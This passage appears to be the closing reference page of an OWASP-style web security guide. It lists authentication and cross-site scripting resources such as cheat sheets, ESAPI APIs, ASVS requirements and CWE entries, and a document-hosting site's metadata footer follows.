Management (V3).
    OWASP Authentication Cheat Sheet
    ESAPI Authenticator API
    ESAPI User API
    OWASP Development Guide: Chapter on Authentication
    OWASP Testing Guide: Chapter on AuthenticationExternal
    CWE Entry 287 on Improper Authentication

      OWASP XSS Prevention Cheat Sheet
      OWASP Cross-Site Scripting Article
      ESAPI Encoder API
      ASVS: Output Encoding/Escaping Requirements (V6)
      ASVS: Input Validation Requirements (V5)
      Testing Guide: 1st 3 Chapters on Data Validation Testing
      OWASP Code Review Guide: Chapter on XSS Review External
      CWE Entry 79 on Cross-Site Scripting
      RSnake’sXSS Attack Cheat Sheet
      Firefox 4’s Anti-XSS Content Security Policy Mechanism




                                      50

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:39
posted:5/14/2012
language:English
pages:50